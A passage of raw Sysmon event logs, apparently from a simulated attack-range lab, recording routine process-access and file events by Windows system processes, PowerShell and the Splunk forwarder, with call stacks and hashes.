Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808464Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:24.994{0C1E0330-F5E4-60EB-9779-00000000D001}3628C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001051081Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:26.966{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F5E6-60EB-817D-00000000CF01}8472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051080Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:26.951{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F5E6-60EB-817D-00000000CF01}8472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051079Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:26.935{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F5E6-60EB-817D-00000000CF01}8472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051078Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:26.888{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5E6-60EB-817D-00000000CF01}8472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051077Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:26.888{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5E6-60EB-817D-00000000CF01}8472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051076Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:26.888{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5E6-60EB-817D-00000000CF01}8472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051075Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:26.888{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F5E6-60EB-827D-00000000CF01}9724C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051074Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:26.888{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F5E6-60EB-827D-00000000CF01}9724C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051073Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:26.882{466BC892-32D3-60E8-770B-00000000CF01}63567136C:\Windows\Explorer.EXE{466BC892-F5E6-60EB-817D-00000000CF01}8472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051072Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:26.881{466BC892-32D3-60E8-770B-00000000CF01}63567136C:\Windows\Explorer.EXE{466BC892-F5E6-60EB-817D-00000000CF01}8472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051071Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:26.881{466BC892-32D3-60E8-770B-00000000CF01}63567136C:\Windows\Explorer.EXE{466BC892-F5E6-60EB-817D-00000000CF01}8472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051070Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:26.880{466BC892-32D3-60E8-770B-00000000CF01}63567136C:\Windows\Explorer.EXE{466BC892-F5E6-60EB-817D-00000000CF01}8472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051069Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:26.880{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5E6-60EB-827D-00000000CF01}9724C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051068Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:26.880{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5E6-60EB-827D-00000000CF01}9724C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051067Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:26.880{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5E6-60EB-827D-00000000CF01}9724C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051066Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:26.879{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5E6-60EB-827D-00000000CF01}9724C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051065Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:26.879{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5942E35791B56BA842C21D9E370EA796,SHA256=B2B2B2AC5349872F07C08872CE6A8FA03A4D94539657C91E6A787E8A421694C3,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001051064Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:26.872{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\test.lnk2021-07-12 07:44:24.124 23542300x8000000000000000808509Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:26.666{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=20F4A289F7A03AB2C175CFAB0E45A068,SHA256=699B955CDA56F81CE458B732270FC2495E9054A8706C8247B018B42E24BFF71B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808508Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:26.353{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F5E6-60EB-9979-00000000D001}3728C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808507Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:26.353{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808506Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:26.353{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808505Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:26.353{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808504Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:26.353{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808503Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:26.353{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808502Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:26.353{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808501Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:26.353{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808500Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:26.353{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808499Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:26.353{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808498Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:26.338{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F5E6-60EB-9979-00000000D001}3728C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808497Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:26.338{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F5E6-60EB-9979-00000000D001}3728C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program 